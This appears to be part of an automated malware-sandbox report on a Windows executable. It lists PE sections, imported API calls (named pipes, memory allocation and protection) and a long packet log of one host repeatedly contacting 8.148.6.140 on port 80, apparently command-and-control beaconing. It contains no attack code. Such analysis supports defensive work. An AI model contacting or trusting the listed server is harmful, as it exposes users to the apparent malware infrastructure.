          .xdata0x520000x2380x4006ce9e303fb86766d702ecb2b174cf348False0.2578125data2.6337753778508075IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
          .bss0x530000x9d00x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .idata0x540000x8d80xa003aae8d98b4d34bad008e73a14573bffdFalse0.323828125data3.966749721413537IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .CRT0x550000x680x20052d79e9aecf5d5c3145d3ec54aa197a8False0.0703125data0.2709192282599745IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .tls0x560000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          DLLImport
          KERNEL32.dllCloseHandle, ConnectNamedPipe, CreateFileA, CreateNamedPipeA, CreateThread, DeleteCriticalSection, EnterCriticalSection, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetLastError, GetModuleHandleA, GetProcAddress, GetStartupInfoA, GetSystemTimeAsFileTime, GetTickCount, InitializeCriticalSection, LeaveCriticalSection, QueryPerformanceCounter, ReadFile, RtlAddFunctionTable, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsGetValue, UnhandledExceptionFilter, VirtualAlloc, VirtualProtect, VirtualQuery, WriteFile
          msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _fmode, _initterm, _onexit, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, signal, sprintf, strlen, strncmp, vfprintf
          TimestampSource PortDest PortSource IPDest IP
          Jan 10, 2025 09:24:57.367255926 CET4970980192.168.2.68.148.6.140
          Jan 10, 2025 09:24:57.372132063 CET80497098.148.6.140192.168.2.6
          Jan 10, 2025 09:24:57.372256994 CET4970980192.168.2.68.148.6.140
          Jan 10, 2025 09:24:57.372459888 CET4970980192.168.2.68.148.6.140
          Jan 10, 2025 09:24:57.377312899 CET80497098.148.6.140192.168.2.6
          Jan 10, 2025 09:24:58.357806921 CET80497098.148.6.140192.168.2.6
          Jan 10, 2025 09:24:58.357911110 CET4970980192.168.2.68.148.6.140
          Jan 10, 2025 09:24:58.357927084 CET80497098.148.6.140192.168.2.6
          Jan 10, 2025 09:24:58.357974052 CET4970980192.168.2.68.148.6.140
          Jan 10, 2025 09:24:58.358077049 CET4970980192.168.2.68.148.6.140
          Jan 10, 2025 09:24:58.362859964 CET80497098.148.6.140192.168.2.6
          Jan 10, 2025 09:24:58.477029085 CET4971080192.168.2.68.148.6.140
          Jan 10, 2025 09:24:58.481918097 CET80497108.148.6.140192.168.2.6
          Jan 10, 2025 09:24:58.482009888 CET4971080192.168.2.68.148.6.140
          Jan 10, 2025 09:24:58.482283115 CET4971080192.168.2.68.148.6.140
          Jan 10, 2025 09:24:58.487159967 CET80497108.148.6.140192.168.2.6
          Jan 10, 2025 09:25:00.032339096 CET80497108.148.6.140192.168.2.6
          Jan 10, 2025 09:25:00.032417059 CET4971080192.168.2.68.148.6.140
          Jan 10, 2025 09:25:00.032510996 CET80497108.148.6.140192.168.2.6
          Jan 10, 2025 09:25:00.032568932 CET4971080192.168.2.68.148.6.140
          Jan 10, 2025 09:25:00.032660007 CET4971080192.168.2.68.148.6.140
          Jan 10, 2025 09:25:00.038943052 CET80497108.148.6.140192.168.2.6
          Jan 10, 2025 09:25:00.149182081 CET4971180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:00.155448914 CET80497118.148.6.140192.168.2.6
          Jan 10, 2025 09:25:00.155579090 CET4971180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:00.155724049 CET4971180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:00.161375046 CET80497118.148.6.140192.168.2.6
          Jan 10, 2025 09:25:04.134390116 CET80497118.148.6.140192.168.2.6
          Jan 10, 2025 09:25:04.134474993 CET4971180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:04.134537935 CET80497118.148.6.140192.168.2.6
          Jan 10, 2025 09:25:04.134584904 CET4971180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:04.134978056 CET4971180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:04.139834881 CET80497118.148.6.140192.168.2.6
          Jan 10, 2025 09:25:04.242764950 CET4971480192.168.2.68.148.6.140
          Jan 10, 2025 09:25:04.247626066 CET80497148.148.6.140192.168.2.6
          Jan 10, 2025 09:25:04.247736931 CET4971480192.168.2.68.148.6.140
          Jan 10, 2025 09:25:04.248008966 CET4971480192.168.2.68.148.6.140
          Jan 10, 2025 09:25:04.252800941 CET80497148.148.6.140192.168.2.6
          Jan 10, 2025 09:25:05.225856066 CET80497148.148.6.140192.168.2.6
          Jan 10, 2025 09:25:05.225918055 CET80497148.148.6.140192.168.2.6
          Jan 10, 2025 09:25:05.225939035 CET4971480192.168.2.68.148.6.140
          Jan 10, 2025 09:25:05.226022005 CET4971480192.168.2.68.148.6.140
          Jan 10, 2025 09:25:05.226305008 CET4971480192.168.2.68.148.6.140
          Jan 10, 2025 09:25:05.231098890 CET80497148.148.6.140192.168.2.6
          Jan 10, 2025 09:25:05.336360931 CET4972180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:05.341227055 CET80497218.148.6.140192.168.2.6
          Jan 10, 2025 09:25:05.341316938 CET4972180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:05.341588974 CET4972180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:05.346504927 CET80497218.148.6.140192.168.2.6
          Jan 10, 2025 09:25:06.302859068 CET80497218.148.6.140192.168.2.6
          Jan 10, 2025 09:25:06.302975893 CET80497218.148.6.140192.168.2.6
          Jan 10, 2025 09:25:06.303042889 CET4972180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:06.303236961 CET4972180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:06.303236961 CET4972180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:06.308017015 CET80497218.148.6.140192.168.2.6
          Jan 10, 2025 09:25:06.414550066 CET4973180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:06.419504881 CET80497318.148.6.140192.168.2.6
          Jan 10, 2025 09:25:06.419756889 CET4973180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:06.419847012 CET4973180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:06.424684048 CET80497318.148.6.140192.168.2.6
          Jan 10, 2025 09:25:07.390146971 CET80497318.148.6.140192.168.2.6
          Jan 10, 2025 09:25:07.390269041 CET4973180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:07.390309095 CET80497318.148.6.140192.168.2.6
          Jan 10, 2025 09:25:07.390369892 CET4973180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:07.390595913 CET4973180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:07.395411968 CET80497318.148.6.140192.168.2.6
          Jan 10, 2025 09:25:07.493468046 CET4973780192.168.2.68.148.6.140
          Jan 10, 2025 09:25:07.498327017 CET80497378.148.6.140192.168.2.6
          Jan 10, 2025 09:25:07.498430967 CET4973780192.168.2.68.148.6.140
          Jan 10, 2025 09:25:07.498735905 CET4973780192.168.2.68.148.6.140
          Jan 10, 2025 09:25:07.503542900 CET80497378.148.6.140192.168.2.6
          Jan 10, 2025 09:25:11.480207920 CET80497378.148.6.140192.168.2.6
          Jan 10, 2025 09:25:11.480298042 CET4973780192.168.2.68.148.6.140
          Jan 10, 2025 09:25:11.480307102 CET80497378.148.6.140192.168.2.6
          Jan 10, 2025 09:25:11.480359077 CET4973780192.168.2.68.148.6.140
          Jan 10, 2025 09:25:11.480423927 CET4973780192.168.2.68.148.6.140
          Jan 10, 2025 09:25:11.485306025 CET80497378.148.6.140192.168.2.6
          Jan 10, 2025 09:25:11.586211920 CET4976580192.168.2.68.148.6.140
          Jan 10, 2025 09:25:11.591063976 CET80497658.148.6.140192.168.2.6
          Jan 10, 2025 09:25:11.591145992 CET4976580192.168.2.68.148.6.140
          Jan 10, 2025 09:25:11.591334105 CET4976580192.168.2.68.148.6.140
          Jan 10, 2025 09:25:11.596112967 CET80497658.148.6.140192.168.2.6
          Jan 10, 2025 09:25:12.575119972 CET80497658.148.6.140192.168.2.6
          Jan 10, 2025 09:25:12.575267076 CET4976580192.168.2.68.148.6.140
          Jan 10, 2025 09:25:12.575289011 CET80497658.148.6.140192.168.2.6
          Jan 10, 2025 09:25:12.575362921 CET80497658.148.6.140192.168.2.6
          Jan 10, 2025 09:25:12.575416088 CET4976580192.168.2.68.148.6.140
          Jan 10, 2025 09:25:12.575539112 CET4976580192.168.2.68.148.6.140
          Jan 10, 2025 09:25:12.580543041 CET80497658.148.6.140192.168.2.6
          Jan 10, 2025 09:25:12.680046082 CET4977880192.168.2.68.148.6.140
          Jan 10, 2025 09:25:12.684880018 CET80497788.148.6.140192.168.2.6
          Jan 10, 2025 09:25:12.684952974 CET4977880192.168.2.68.148.6.140
          Jan 10, 2025 09:25:12.685149908 CET4977880192.168.2.68.148.6.140
          Jan 10, 2025 09:25:12.689944029 CET80497788.148.6.140192.168.2.6
          Jan 10, 2025 09:25:13.646812916 CET80497788.148.6.140192.168.2.6
          Jan 10, 2025 09:25:13.646873951 CET4977880192.168.2.68.148.6.140
          Jan 10, 2025 09:25:13.646960974 CET80497788.148.6.140192.168.2.6
          Jan 10, 2025 09:25:13.646985054 CET80497788.148.6.140192.168.2.6
          Jan 10, 2025 09:25:13.647130966 CET4977880192.168.2.68.148.6.140
          Jan 10, 2025 09:25:13.647249937 CET4977880192.168.2.68.148.6.140
          Jan 10, 2025 09:25:13.652084112 CET80497788.148.6.140192.168.2.6
          Jan 10, 2025 09:25:13.758826971 CET4978680192.168.2.68.148.6.140
          Jan 10, 2025 09:25:13.763710976 CET80497868.148.6.140192.168.2.6
          Jan 10, 2025 09:25:13.763792038 CET4978680192.168.2.68.148.6.140
          Jan 10, 2025 09:25:13.763993025 CET4978680192.168.2.68.148.6.140
          Jan 10, 2025 09:25:13.768770933 CET80497868.148.6.140192.168.2.6
          Jan 10, 2025 09:25:14.756736994 CET80497868.148.6.140192.168.2.6
          Jan 10, 2025 09:25:14.756846905 CET80497868.148.6.140192.168.2.6
          Jan 10, 2025 09:25:14.756957054 CET4978680192.168.2.68.148.6.140
          Jan 10, 2025 09:25:14.782536030 CET4978680192.168.2.68.148.6.140
          Jan 10, 2025 09:25:14.787323952 CET80497868.148.6.140192.168.2.6
          Jan 10, 2025 09:25:14.987703085 CET4979680192.168.2.68.148.6.140
          Jan 10, 2025 09:25:14.992662907 CET80497968.148.6.140192.168.2.6
          Jan 10, 2025 09:25:14.992742062 CET4979680192.168.2.68.148.6.140
          Jan 10, 2025 09:25:14.995476007 CET4979680192.168.2.68.148.6.140
          Jan 10, 2025 09:25:15.000344992 CET80497968.148.6.140192.168.2.6
          Jan 10, 2025 09:25:15.938654900 CET80497968.148.6.140192.168.2.6
          Jan 10, 2025 09:25:15.938674927 CET80497968.148.6.140192.168.2.6
          Jan 10, 2025 09:25:15.938736916 CET4979680192.168.2.68.148.6.140
          Jan 10, 2025 09:25:15.938930035 CET4979680192.168.2.68.148.6.140
          Jan 10, 2025 09:25:15.943980932 CET80497968.148.6.140192.168.2.6
          Jan 10, 2025 09:25:16.054989100 CET4980380192.168.2.68.148.6.140
          Jan 10, 2025 09:25:16.059864998 CET80498038.148.6.140192.168.2.6
          Jan 10, 2025 09:25:16.059964895 CET4980380192.168.2.68.148.6.140
          Jan 10, 2025 09:25:16.060157061 CET4980380192.168.2.68.148.6.140
          Jan 10, 2025 09:25:16.064943075 CET80498038.148.6.140192.168.2.6
          Jan 10, 2025 09:25:20.026225090 CET80498038.148.6.140192.168.2.6
          Jan 10, 2025 09:25:20.026446104 CET80498038.148.6.140192.168.2.6
          Jan 10, 2025 09:25:20.026896954 CET4980380192.168.2.68.148.6.140
          Jan 10, 2025 09:25:20.030257940 CET4980380192.168.2.68.148.6.140
          Jan 10, 2025 09:25:20.035258055 CET80498038.148.6.140192.168.2.6
          Jan 10, 2025 09:25:20.134533882 CET4982980192.168.2.68.148.6.140
          Jan 10, 2025 09:25:20.139853001 CET80498298.148.6.140192.168.2.6
          Jan 10, 2025 09:25:20.140011072 CET4982980192.168.2.68.148.6.140
          Jan 10, 2025 09:25:20.140230894 CET4982980192.168.2.68.148.6.140
          Jan 10, 2025 09:25:20.145319939 CET80498298.148.6.140192.168.2.6
          Jan 10, 2025 09:25:24.148230076 CET4982980192.168.2.68.148.6.140
          Jan 10, 2025 09:25:24.258243084 CET4985280192.168.2.68.148.6.140
          Jan 10, 2025 09:25:24.263376951 CET80498528.148.6.140192.168.2.6
          Jan 10, 2025 09:25:24.263667107 CET4985280192.168.2.68.148.6.140
          Jan 10, 2025 09:25:24.263667107 CET4985280192.168.2.68.148.6.140
          Jan 10, 2025 09:25:24.269136906 CET80498528.148.6.140192.168.2.6
          Jan 10, 2025 09:25:28.246922016 CET80498528.148.6.140192.168.2.6
          Jan 10, 2025 09:25:28.247061968 CET4985280192.168.2.68.148.6.140
          Jan 10, 2025 09:25:28.247102022 CET80498528.148.6.140192.168.2.6
          Jan 10, 2025 09:25:28.247148037 CET4985280192.168.2.68.148.6.140
          Jan 10, 2025 09:25:28.247201920 CET4985280192.168.2.68.148.6.140
          Jan 10, 2025 09:25:28.252003908 CET80498528.148.6.140192.168.2.6
          Jan 10, 2025 09:25:28.367619991 CET4987680192.168.2.68.148.6.140
          Jan 10, 2025 09:25:28.372581959 CET80498768.148.6.140192.168.2.6
          Jan 10, 2025 09:25:28.372697115 CET4987680192.168.2.68.148.6.140
          Jan 10, 2025 09:25:28.376948118 CET4987680192.168.2.68.148.6.140
          Jan 10, 2025 09:25:28.381786108 CET80498768.148.6.140192.168.2.6
          Jan 10, 2025 09:25:29.349307060 CET80498768.148.6.140192.168.2.6
          Jan 10, 2025 09:25:29.349438906 CET80498768.148.6.140192.168.2.6
          Jan 10, 2025 09:25:29.349500895 CET4987680192.168.2.68.148.6.140
          Jan 10, 2025 09:25:29.349500895 CET4987680192.168.2.68.148.6.140
          Jan 10, 2025 09:25:29.349602938 CET4987680192.168.2.68.148.6.140
          Jan 10, 2025 09:25:29.354444981 CET80498768.148.6.140192.168.2.6
          Jan 10, 2025 09:25:29.461474895 CET4988580192.168.2.68.148.6.140
          Jan 10, 2025 09:25:29.466306925 CET80498858.148.6.140192.168.2.6
          Jan 10, 2025 09:25:29.466411114 CET4988580192.168.2.68.148.6.140
          Jan 10, 2025 09:25:29.466532946 CET4988580192.168.2.68.148.6.140
          Jan 10, 2025 09:25:29.471296072 CET80498858.148.6.140192.168.2.6
          Jan 10, 2025 09:25:30.456492901 CET80498858.148.6.140192.168.2.6
          Jan 10, 2025 09:25:30.456510067 CET80498858.148.6.140192.168.2.6
          Jan 10, 2025 09:25:30.456597090 CET4988580192.168.2.68.148.6.140
          Jan 10, 2025 09:25:30.456794024 CET4988580192.168.2.68.148.6.140
          Jan 10, 2025 09:25:30.461525917 CET80498858.148.6.140192.168.2.6
          Jan 10, 2025 09:25:30.573402882 CET4989180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:30.578228951 CET80498918.148.6.140192.168.2.6
          Jan 10, 2025 09:25:30.578324080 CET4989180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:30.580194950 CET4989180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:30.584958076 CET80498918.148.6.140192.168.2.6
          Jan 10, 2025 09:25:34.585571051 CET4989180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:34.696378946 CET4991880192.168.2.68.148.6.140
          Jan 10, 2025 09:25:34.701252937 CET80499188.148.6.140192.168.2.6
          Jan 10, 2025 09:25:34.701339006 CET4991880192.168.2.68.148.6.140
          Jan 10, 2025 09:25:34.707501888 CET4991880192.168.2.68.148.6.140
          Jan 10, 2025 09:25:34.712331057 CET80499188.148.6.140192.168.2.6
          Jan 10, 2025 09:25:35.672286987 CET80499188.148.6.140192.168.2.6
          Jan 10, 2025 09:25:35.672410011 CET4991880192.168.2.68.148.6.140
          Jan 10, 2025 09:25:35.672787905 CET80499188.148.6.140192.168.2.6
          Jan 10, 2025 09:25:35.672840118 CET4991880192.168.2.68.148.6.140
          Jan 10, 2025 09:25:35.672863007 CET80499188.148.6.140192.168.2.6
          Jan 10, 2025 09:25:35.673754930 CET4991880192.168.2.68.148.6.140
          Jan 10, 2025 09:25:35.791896105 CET4991880192.168.2.68.148.6.140
          Jan 10, 2025 09:25:35.792459011 CET4992780192.168.2.68.148.6.140
          Jan 10, 2025 09:25:35.796740055 CET80499188.148.6.140192.168.2.6
          Jan 10, 2025 09:25:35.797348022 CET80499278.148.6.140192.168.2.6
          Jan 10, 2025 09:25:35.797472954 CET4992780192.168.2.68.148.6.140
          Jan 10, 2025 09:25:35.797630072 CET4992780192.168.2.68.148.6.140
          Jan 10, 2025 09:25:35.802409887 CET80499278.148.6.140192.168.2.6
          Jan 10, 2025 09:25:39.808909893 CET4992780192.168.2.68.148.6.140
          Jan 10, 2025 09:25:39.961524963 CET4995180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:39.966320038 CET80499518.148.6.140192.168.2.6
          Jan 10, 2025 09:25:39.966396093 CET4995180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:39.966686964 CET4995180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:39.972619057 CET80499518.148.6.140192.168.2.6
          Jan 10, 2025 09:25:40.969285011 CET80499518.148.6.140192.168.2.6
          Jan 10, 2025 09:25:40.969348907 CET4995180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:40.969417095 CET80499518.148.6.140192.168.2.6
          Jan 10, 2025 09:25:40.969583988 CET4995180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:41.085896969 CET4995180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:41.086410999 CET4996180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:41.090784073 CET80499518.148.6.140192.168.2.6
          Jan 10, 2025 09:25:41.091238976 CET80499618.148.6.140192.168.2.6
          Jan 10, 2025 09:25:41.091319084 CET4996180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:41.091602087 CET4996180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:41.096414089 CET80499618.148.6.140192.168.2.6
          Jan 10, 2025 09:25:42.065077066 CET80499618.148.6.140192.168.2.6
          Jan 10, 2025 09:25:42.065109015 CET80499618.148.6.140192.168.2.6
          Jan 10, 2025 09:25:42.065285921 CET4996180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:42.065448999 CET4996180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:42.070235014 CET80499618.148.6.140192.168.2.6
          Jan 10, 2025 09:25:42.180341005 CET4996880192.168.2.68.148.6.140
          Jan 10, 2025 09:25:42.185214043 CET80499688.148.6.140192.168.2.6
          Jan 10, 2025 09:25:42.185357094 CET4996880192.168.2.68.148.6.140
          Jan 10, 2025 09:25:42.185496092 CET4996880192.168.2.68.148.6.140
          Jan 10, 2025 09:25:42.190360069 CET80499688.148.6.140192.168.2.6
          Jan 10, 2025 09:25:44.532581091 CET80499688.148.6.140192.168.2.6
          Jan 10, 2025 09:25:44.532723904 CET80499688.148.6.140192.168.2.6
          Jan 10, 2025 09:25:44.532732964 CET4996880192.168.2.68.148.6.140
          Jan 10, 2025 09:25:44.532820940 CET4996880192.168.2.68.148.6.140
          Jan 10, 2025 09:25:44.532927990 CET4996880192.168.2.68.148.6.140
          Jan 10, 2025 09:25:44.537693024 CET80499688.148.6.140192.168.2.6
          Jan 10, 2025 09:25:44.649471998 CET4998380192.168.2.68.148.6.140
          Jan 10, 2025 09:25:44.654372931 CET80499838.148.6.140192.168.2.6
          Jan 10, 2025 09:25:44.654500961 CET4998380192.168.2.68.148.6.140
          Jan 10, 2025 09:25:44.654841900 CET4998380192.168.2.68.148.6.140
          Jan 10, 2025 09:25:44.659638882 CET80499838.148.6.140192.168.2.6
          Jan 10, 2025 09:25:45.650706053 CET80499838.148.6.140192.168.2.6
          Jan 10, 2025 09:25:45.650790930 CET4998380192.168.2.68.148.6.140
          Jan 10, 2025 09:25:45.650829077 CET80499838.148.6.140192.168.2.6
          Jan 10, 2025 09:25:45.650913954 CET4998380192.168.2.68.148.6.140
          Jan 10, 2025 09:25:45.651000023 CET4998380192.168.2.68.148.6.140
          Jan 10, 2025 09:25:45.655833006 CET80499838.148.6.140192.168.2.6
          Jan 10, 2025 09:25:45.758423090 CET4999380192.168.2.68.148.6.140
          Jan 10, 2025 09:25:45.763302088 CET80499938.148.6.140192.168.2.6
          Jan 10, 2025 09:25:45.763392925 CET4999380192.168.2.68.148.6.140
          Jan 10, 2025 09:25:45.763552904 CET4999380192.168.2.68.148.6.140
          Jan 10, 2025 09:25:45.768323898 CET80499938.148.6.140192.168.2.6
          Jan 10, 2025 09:25:46.759440899 CET80499938.148.6.140192.168.2.6
          Jan 10, 2025 09:25:46.759573936 CET4999380192.168.2.68.148.6.140
          Jan 10, 2025 09:25:46.759577036 CET80499938.148.6.140192.168.2.6
          Jan 10, 2025 09:25:46.759622097 CET4999380192.168.2.68.148.6.140
          Jan 10, 2025 09:25:46.759893894 CET80499938.148.6.140192.168.2.6
          Jan 10, 2025 09:25:46.759941101 CET4999380192.168.2.68.148.6.140
          Jan 10, 2025 09:25:46.867181063 CET4999380192.168.2.68.148.6.140
          Jan 10, 2025 09:25:46.867547035 CET5000080192.168.2.68.148.6.140
          Jan 10, 2025 09:25:46.872020960 CET80499938.148.6.140192.168.2.6
          Jan 10, 2025 09:25:46.872345924 CET80500008.148.6.140192.168.2.6
          Jan 10, 2025 09:25:46.872421980 CET5000080192.168.2.68.148.6.140
          Jan 10, 2025 09:25:46.872667074 CET5000080192.168.2.68.148.6.140
          Jan 10, 2025 09:25:46.877439976 CET80500008.148.6.140192.168.2.6
          Jan 10, 2025 09:25:51.018626928 CET5000080192.168.2.68.148.6.140
          Jan 10, 2025 09:25:51.133219957 CET5000980192.168.2.68.148.6.140
          Jan 10, 2025 09:25:51.138206005 CET80500098.148.6.140192.168.2.6
          Jan 10, 2025 09:25:51.138290882 CET5000980192.168.2.68.148.6.140
          Jan 10, 2025 09:25:51.138451099 CET5000980192.168.2.68.148.6.140
          Jan 10, 2025 09:25:51.143305063 CET80500098.148.6.140192.168.2.6
          Jan 10, 2025 09:25:52.697487116 CET80500098.148.6.140192.168.2.6
          Jan 10, 2025 09:25:52.697520018 CET80500098.148.6.140192.168.2.6
          Jan 10, 2025 09:25:52.697592974 CET5000980192.168.2.68.148.6.140
          Jan 10, 2025 09:25:52.697637081 CET5000980192.168.2.68.148.6.140
          Jan 10, 2025 09:25:52.697716951 CET5000980192.168.2.68.148.6.140
          Jan 10, 2025 09:25:52.703018904 CET80500098.148.6.140192.168.2.6
          Jan 10, 2025 09:25:52.804835081 CET5001080192.168.2.68.148.6.140
          Jan 10, 2025 09:25:52.809823036 CET80500108.148.6.140192.168.2.6
          Jan 10, 2025 09:25:52.809917927 CET5001080192.168.2.68.148.6.140
          Jan 10, 2025 09:25:52.810017109 CET5001080192.168.2.68.148.6.140
          Jan 10, 2025 09:25:52.814760923 CET80500108.148.6.140192.168.2.6
          Jan 10, 2025 09:25:53.808669090 CET80500108.148.6.140192.168.2.6
          Jan 10, 2025 09:25:53.808723927 CET5001080192.168.2.68.148.6.140
          Jan 10, 2025 09:25:53.808751106 CET80500108.148.6.140192.168.2.6
          Jan 10, 2025 09:25:53.808792114 CET5001080192.168.2.68.148.6.140
          Jan 10, 2025 09:25:53.809062004 CET5001080192.168.2.68.148.6.140
          Jan 10, 2025 09:25:53.813857079 CET80500108.148.6.140192.168.2.6
          Jan 10, 2025 09:25:53.917885065 CET5001180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:53.922827005 CET80500118.148.6.140192.168.2.6
          Jan 10, 2025 09:25:53.922916889 CET5001180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:53.923063993 CET5001180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:53.927803040 CET80500118.148.6.140192.168.2.6
          Jan 10, 2025 09:25:54.939260960 CET80500118.148.6.140192.168.2.6
          Jan 10, 2025 09:25:54.939343929 CET80500118.148.6.140192.168.2.6
          Jan 10, 2025 09:25:54.939445972 CET5001180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:54.939446926 CET5001180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:54.939555883 CET5001180192.168.2.68.148.6.140
          Jan 10, 2025 09:25:54.944524050 CET80500118.148.6.140192.168.2.6
          Jan 10, 2025 09:25:55.055161953 CET5001280192.168.2.68.148.6.140
          Jan 10, 2025 09:25:55.060081005 CET80500128.148.6.140192.168.2.6
          Jan 10, 2025 09:25:55.060234070 CET5001280192.168.2.68.148.6.140
          Jan 10, 2025 09:25:55.060357094 CET5001280192.168.2.68.148.6.140
          Jan 10, 2025 09:25:55.065149069 CET80500128.148.6.140192.168.2.6
          Jan 10, 2025 09:25:59.054325104 CET5001280192.168.2.68.148.6.140
          Jan 10, 2025 09:25:59.169287920 CET5001380192.168.2.68.148.6.140
          Jan 10, 2025 09:25:59.174364090 CET80500138.148.6.140192.168.2.6
          Jan 10, 2025 09:25:59.174479008 CET5001380192.168.2.68.148.6.140
          Jan 10, 2025 09:25:59.174638987 CET5001380192.168.2.68.148.6.140
          Jan 10, 2025 09:25:59.179419994 CET80500138.148.6.140192.168.2.6
          Jan 10, 2025 09:26:00.145867109 CET80500138.148.6.140192.168.2.6
          Jan 10, 2025 09:26:00.145940065 CET80500138.148.6.140192.168.2.6
          Jan 10, 2025 09:26:00.145961046 CET80500138.148.6.140192.168.2.6
          Jan 10, 2025 09:26:00.146022081 CET5001380192.168.2.68.148.6.140
          Jan 10, 2025 09:26:00.146054983 CET5001380192.168.2.68.148.6.140
          Jan 10, 2025 09:26:00.146245003 CET5001380192.168.2.68.148.6.140
          Jan 10, 2025 09:26:00.151032925 CET80500138.148.6.140192.168.2.6
          Jan 10, 2025 09:26:00.258383036 CET5001480192.168.2.68.148.6.140
          Jan 10, 2025 09:26:00.263279915 CET80500148.148.6.140192.168.2.6
          Jan 10, 2025 09:26:00.263350964 CET5001480192.168.2.68.148.6.140
          Jan 10, 2025 09:26:00.263515949 CET5001480192.168.2.68.148.6.140
          Jan 10, 2025 09:26:00.268316984 CET80500148.148.6.140192.168.2.6
          Jan 10, 2025 09:26:01.230549097 CET80500148.148.6.140192.168.2.6
          Jan 10, 2025 09:26:01.230654001 CET5001480192.168.2.68.148.6.140
          Jan 10, 2025 09:26:01.230680943 CET80500148.148.6.140192.168.2.6
          Jan 10, 2025 09:26:01.230770111 CET5001480192.168.2.68.148.6.140
          Jan 10, 2025 09:26:01.231236935 CET5001480192.168.2.68.148.6.140
          Jan 10, 2025 09:26:01.236025095 CET80500148.148.6.140192.168.2.6
          Jan 10, 2025 09:26:01.336622953 CET5001680192.168.2.68.148.6.140
          Jan 10, 2025 09:26:01.429048061 CET80500168.148.6.140192.168.2.6
